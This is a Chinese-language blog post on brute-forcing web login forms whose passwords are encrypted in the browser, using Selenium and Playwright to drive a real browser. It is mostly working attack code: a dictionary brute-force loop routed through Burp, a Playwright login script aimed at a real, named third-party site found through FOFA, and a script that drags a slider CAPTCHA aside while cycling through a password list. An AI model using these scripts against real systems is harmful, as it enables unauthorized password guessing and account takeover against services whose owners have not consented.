前言

挖掘SRC的时候，爆破登录框时，发现密码字段被加密了，不知道加密算法，如果是通过前端JS进行加密的话，往往要通过寻找JS文件了解加密过程。找到加密函数以后又要想办法构造密码字典，我个人感觉有点费时费力。那么有没有一个万能的方法呢？

0x01 使用python的selenium库来模拟浏览器自动化点击

在这之前，我只知道通过python的selenium库模拟浏览器来获取标题。

前期准备：

既然要模拟，那就要先搭建环境：
参照网上的拼凑一下

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>加密测试页面</title>
    <script src="md5.js"></script>
    <script>
        function md5passwd(){
            passwd = document.getElementById("password").value;
            document.getElementById("password").value = hex_md5(passwd);
            return true;            
        }
    </script>
</head>
<form action="login.php" method="post" onsubmit="return md5passwd()">
        <table width="450" border="0" bgcolor="#000000" cellspacing="1" cellpadding="2"><!--cellspacing指相邻单元格之间的间距，cellpadding指控制单元格内部文字与边框的边距-->
        <tbody>
            <tr height="30">
                <td colspan="2" align="center" bgcolor="#CCCCCC"><font size="5">用户登录</font></td>
            </tr>
            <tr height="30">
                <td width="150" align="right" bgcolor="#E6E6E6">用户名</td>
                <td width="300" bgcolor="#E6E6E6">
                    <input type="text" name="username" id="username" maxlength="20" size="15" /></td>
            </tr>
            <tr height="30">
                <td align="right" bgcolor="#E6E6E6">密码</td>
                <td bgcolor="#E6E6E6">
                    <input name="password" type="password" id="password" size="15" maxlength="20" value=""/></td>
            </tr>
            <tr height="30">
                <td align="center" colspan="2" bgcolor="#CCCCCC">
                    <input type="submit" name="submit" id="submit" value="提交" />
                </td>
            </tr>
</form>
<?php
if( isset( $_POST[ 'username' ] ) ) {
    $user = $_POST[ 'username' ];
    $pass = $_POST[ 'password' ];
    echo "username: ",$user;
    echo "<br>";
    echo "password: ",$pass;
    echo "<br>";
    if ($pass == "8a30ec6807f71bc69d096d8e4d501ade" and $user == "admin"){
        echo "login successfully!";
    }else{
        echo "用户名或密码错误";
    }
}
?>

当用户输入的账户密码为：

username：admin
password：admin666

输出：login successfully!

效果如下：

利用代码：

import time
from selenium import webdriver

chrome_driver = r'C:\Program Files (x86)\Google\Chrome\Application\chromedriver.exe'
chrome_options = webdriver.ChromeOptions()
chrome_options.add_argument('--headless')  
chrome_options.add_argument('--disable-gpu') 
chrome_options.add_argument('--ignore-certificate-errors')
chrome_options.add_argument('--proxy-server=http://127.0.0.1:8080')

def start_chrome():
    driver = webdriver.Chrome(executable_path=chrome_driver, chrome_options=chrome_options)
    driver.start_client()
    return driver


def find_info(path):
    elms = driver.find_element_by_xpath(path)
    return elms


if __name__ == "__main__":
    url = 'http://192.168.107.136/login.php'
    driver = start_chrome()
    driver.get(url)
    user_path = '/html/body/form/table/tbody/tr[2]/td[2]/input'
    pass_path = '/html/body/form/table/tbody/tr[3]/td[2]/input'
    submit_path = '/html/body/form/table/tbody/tr[4]/td/input'
    with open(r'C:\Users\sws123\Desktop\pass.txt', 'r') as f:
        lines = [line.strip() for line in f.readlines()]
    for line in lines:
        user_xpath = find_info(user_path)
        pass_xpath = find_info(pass_path)
        submit_xpath = find_info(submit_path)
        user_xpath.send_keys('admin')
        time.sleep(1)
        pass_xpath.send_keys(line)
        time.sleep(1)
        submit_xpath.click()
        time.sleep(1)
    driver.quit()

准备好密码字典，打开burp，运行以上代码，成功爆破：

0x02 Playwright：浏览器自动化工具

Playwright 是一个强大的 Python 库，仅用一个 API 即可自动执行 Chromium、Firefox、WebKit 等主流浏览器自动化操作，并同时支持以无头模式、有头模式运行。相比传统的 “selenium” 等工具，他可以录制我们对浏览器的操作并自动生成脚本，同时代码也是非常简单，与我们高效工作的目标非常契合。

安装环境：

pip install playwright
python -m playwright install

运行：

python -m playwright codegen --help
python -m playwright codegen --ignore-https-errors -o 123.py http://yypt.xmjlyypt.cn/Login/Index

fofa实战：

from playwright.sync_api import Playwright, sync_playwright, expect
import time

def run(playwright: Playwright) -> None:
    # browser = playwright.chromium.launch(headless=False)
    browser = playwright.chromium.launch(headless=False,proxy={"server": "http://127.0.0.1:8080"})
    context = browser.new_context(ignore_https_errors=True)
    username= 'admin'
    passwd = '123456'

    # Open new page
    page = context.new_page()

    # Go to http://yypt.xmjlyypt.cn/Login/Index
    page.goto("http://yypt.xmjlyypt.cn/Login/Index")

    # Click [placeholder="请输入您的帐号"]
    page.locator("[placeholder=\"请输入您的帐号\"]").click()

    # Fill [placeholder="请输入您的帐号"]
    page.locator("[placeholder=\"请输入您的帐号\"]").fill(username)

    # Click [placeholder="请输入您的密码"]
    page.locator("[placeholder=\"请输入您的密码\"]").click()
    time.sleep(2)

    # Fill [placeholder="请输入您的密码"]
    page.locator("[placeholder=\"请输入您的密码\"]").fill(passwd)
    time.sleep(2)

    # Click #btnLogin
    page.locator("#btnLogin").click()
    time.sleep(2)

    # Click text=Ok
    page.locator("text=Ok").click()
    time.sleep(2)
    response_html = page.content()
    print(f'username: {username}, password: {passwd}, length: {len(response_html)}, title: {page.title()}')

    # Close page
    # page.close()

    context.close()
    browser.close()

with sync_playwright() as playwright:
    run(playwright)

滑动验证码案例：

输入账号、密码，点击验证码，然后点击登录。录制过程中并不能拖动滑块，所以无法生成滑块的代码，登录操作其余的大部分代码均已生成，也可以看到其代码是非常简单的

暴力破解脚本：

from playwright.sync_api import Playwright, sync_playwright
# chrome的路径
chromepath = r"chromium-939194\chrome-win\chrome.exe"
from time import sleep


def readpasswd(filename):
    fp = open(r"password.txt", 'r', encoding='utf-8')
    return fp

def run(playwright: Playwright) -> None:
    browser = playwright.chromium.launch(executable_path=chromepath, headless=False)
    context = browser.new_context()

    # Open new page
    page = context.new_page()
    fp = readpasswd(1)
    username = 'admin'
    # 循环读取字典暴破
    for passwd in fp:
        page.goto("http://xxx.xxx.xxx.xxx/login.html")

        # Click input[name="userName"]
        page.click("input[name=\"userName\"]")

        # Fill input[name="userName"]
        page.fill("input[name=\"userName\"]", username)

        # Click input[name="password"]
        page.click("input[name=\"password\"]")

        # Fill input[name="password"]
        page.fill("input[name=\"password\"]", passwd)
        # Click text=/.*\>\>.*/
        # 滑动解锁代码
        s = page.wait_for_selector("text=/.*\\>\\>.*/")
        box = s.bounding_box()
        page.mouse.move(box["x"] + box["width"] / 2, box["y"] + box["height"] / 2)
        page.mouse.down()
        # for i in range(10):
        page.mouse.move(box["x"]+520,box["width"]/2, steps=10)

        # Click text=登录
        page.mouse.up()
        page.click("text=登录")
        sleep(1)
        response_html = page.content()
        print(f'username: {username}, password: {passwd}, length: {len(response_html)}, title: {page.title()}')

    context.close()
    browser.close()

with sync_playwright() as playwright:
    run(playwright)

参考如下：

暴力破解的2个问题